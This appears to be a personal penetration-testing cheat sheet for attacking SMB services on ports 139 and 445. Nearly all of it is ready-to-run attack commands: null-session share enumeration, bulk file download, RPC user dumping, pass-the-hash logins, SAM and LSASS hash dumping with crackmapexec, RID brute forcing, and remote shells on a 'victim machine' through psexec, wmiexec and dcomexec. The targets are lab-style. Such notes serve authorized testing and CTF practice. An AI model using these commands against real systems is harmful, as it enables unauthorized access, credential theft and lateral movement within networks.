139-445-smb.md

description
Server Message Block (SMB) is a file and drive sharing protocol that operates on the network level. Samba is the Linux version of SMB. However, they are very similar.

🔥 139, 445/SMB

How does it work?

• SMB/NET-BIOS access generally works in 2 different ways:
  • Null Session- Allows authentication when credentials are not provided to the server.
  • Guest Session- Allows authentication as long as a VALID username is provided to the server. Note: the password is not needed
• Once the authentication type is figured out, we must then figure out what kind of permissions we are granted with that type of authentication.
  • Read/Write, or both?
  • Can we find a confidential file? Does it provide credentials or a hint?
• Remember, smbmap is used to map out drives, not form/establish a connection.
• Meanwhile, smbclient is used to authenticate, form, and establish a connection to a remote SMB server to allow a client to manipulate the server as they please.

Scanning a network for hosts:

nbtscan -r <IP>/24

Enumeration:

smbmap

To list out the shares and associated permissions with Anonymous Access

smbmap -H

To list out shares recursively from hosts in a file and enumerate OS

smbmap --host-file <targets.txt> -v -R -g

To list out the shares recursively

smbmap -R -H

To list shares as an authenticated user

smbmap -d -u -p -H

To list the shares as a Guest user, just provide a username that doesn’t exist

smbmap -u DoesNotExist -H

To download a particular file

smbmap -R -H -A -q

smbclient

To list out the shares:

smbclient -L \\

To connect to shares:

sudo smbclient \\\\active.htb\\USERS

Downloading files:

Once connected, you can download files. You’ll want to disable interactive prompts and turn recursive mode ON.

smb: /> prompt

smb: /> recurse

smb: /> mget *

My favorite command for smbclient

smbclient //10.129.54.94/Replication -c 'recurse;ls'

• Do this when you only have read access and are limited with how you can navigate around the file system
• This will recursively enumerate the file system and show you files that you normally shouldn't be able to see

#Dump interesting information
enum4linux -a [-u "<username>" -p "<passwd>"] <IP>
enum4linux-ng -A [-u "<username>" -p "<passwd>"] <IP>
nmap --script "safe or smb-enum-*" -p 445 <IP>

#Connect to the rpc
rpcclient -U "" -N <IP> #No creds
rpcclient //machine.htb -U domain.local/USERNAME%754d87d42adabcca32bdb34a876cbffb  --pw-nt-hash
#You can use querydispinfo and enumdomusers to query user information

#Dump user information
/usr/share/doc/python3-impacket/examples/samrdump.py -port 139 [[domain/]username[:password]@]<targetName or address>
/usr/share/doc/python3-impacket/examples/samrdump.py -port 445 [[domain/]username[:password]@]<targetName or address>

#Map possible RPC endpoints
/usr/share/doc/python3-impacket/examples/rpcdump.py -port 135 [[domain/]username[:password]@]<targetName or address>
/usr/share/doc/python3-impacket/examples/rpcdump.py -port 139 [[domain/]username[:password]@]<targetName or address>
/usr/share/doc/python3-impacket/examples/rpcdump.py -port 445 [[domain/]username[:password]@]<targetName or address>

Listing Shared Folders:

smbclient --no-pass -L //<IP> # Null user
smbclient -U 'username[%passwd]' -L [--pw-nt-hash] //<IP> #If you omit the pwd, it will be prompted. With --pw-nt-hash, the pwd provided is the NT hash

smbmap -H <IP> [-P <PORT>] #Null user
smbmap -u "username" -p "password" -H <IP> [-P <PORT>] #Creds
smbmap -u "username" -p "<NT>:<LM>" -H <IP> [-P <PORT>] #Pass-the-Hash

crackmapexec smb <IP> -u '' -p '' --shares #Null user
crackmapexec smb <IP> -u 'username' -p 'password' --shares #Guest user
crackmapexec smb <IP> -u 'username' -H '<HASH>' --shares #Guest user

Connect/List a shared folder:

#Connect using smbclient
smbclient --no-pass //<IP>/<Folder>
smbclient -U 'User' '//IP/folder'
smbclient -U 'username[%passwd]' -L [--pw-nt-hash] //<IP> #If you omit the pwd, it will be prompted. With --pw-nt-hash, the pwd provided is the NT hash
#Use --no-pass -c 'recurse;ls'  to list recursively with smbclient

#List with smbmap, without folder it list everything
smbmap [-u "username" -p "password"] -R [Folder] -H <IP> [-P <PORT>] # Recursive list
smbmap [-u "username" -p "password"] -r [Folder] -H <IP> [-P <PORT>] # Non-Recursive list
smbmap -u "username" -p "<NT>:<LM>" [-r/-R] [Folder] -H <IP> [-P <PORT>] #Pass-the-Hash

Null vs Authenticated sessions to a Windows share:

**smbclient -U '%' -N \\\\\\\\<IP>\\\\<SHARE> # null session to connect to a windows share
smbclient -U '<USER>' \\\\\\\\<IP>\\\\<SHARE> # authenticated session to connect to a windows share (you will be prompted for a password)**

Mount a shared folder:

mount -t cifs //x.x.x.x/share /mnt/share
mount -t cifs -o "username=user,password=password" //x.x.x.x/share /mnt/share

Downloading files via smbmap:

#Search a file and download
sudo smbmap -R Folder -H <IP> -A <FileName> -q # Search the file in recursive mode and download it inside /usr/share/smbmap

Downloading files via smbclient (all files):

#Download all
smbclient //<IP>/<share>
> mask ""
> recurse
> prompt
> mget *
#Download everything to current directory

Enumerate local users with Impacket:

lookupsid.py -no-pass hostname.local

Authenticate using Kerberos:

• Authenticate to Kerberos via smbclient and rpcclient

smbclient --kerberos //ws01win10.domain.com/C$
rpcclient -k ws01win10.domain.com

Have valid creds? Run the following lucrative commands for some juicy information:

crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --sam #Dump SAM
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --lsa #Dump LSASS in memmory hashes
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --sessions #Get sessions (
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --loggedon-users #Get logged-on users
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --disks #Enumerate the disks
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --users #Enumerate users
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --groups # Enumerate groups
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --local-groups # Enumerate local groups
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --pass-pol #Get password policy
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --rid-brute #RID brute

psexec/smbexec:

• Both options will create a new service in the victim machine and use it to execute an executable over the network.

#If no password is provided, it will be prompted
./psexec.py [[domain/]username[:password]@]<targetName or address>
./psexec.py -hashes <LM:NT> administrator@10.10.10.103 #Pass-the-Hash
psexec \\\\192.168.122.66 -u Administrator -p 123456Ww
psexec \\\\192.168.122.66 -u Administrator -p q23q34t34twd3w34t34wtw34t # Use pass the hash

wmiexec/dcomexec:

• Use the following to stealthily execute command shells without touching the disk or to begin to run a new service using DCOM on port 135:

wmiexec.py:

#If no password is provided, it will be prompted
./wmiexec.py [[domain/]username[:password]@]<targetName or address> #Prompt for password
./wmiexec.py -hashes LM:NT administrator@10.10.10.103 #Pass-the-Hash
#You can append to the end of the command a CMD command to be executed, if you dont do that a semi-interactive shell will be prompted

dcomexec.py:

#If no password is provided, it will be prompted
./dcomexec.py [[domain/]username[:password]@]<targetName or address>
./dcomexec.py -hashes <LM:NT> administrator@10.10.10.103 #Pass-the-Hash
#You can append to the end of the command a CMD command to be executed, if you dont do that a semi-interactive shell will be prompted

Tools:

CrackMapExec

enum4linux (works for SMB and Samba hosts)

smbmap

• Checks what shares are available
• Reveals permissions information

smbclient

• Used to actively connect to the SMB server
• Allows a user to access the shares allowed by the server

smbmap → smbclient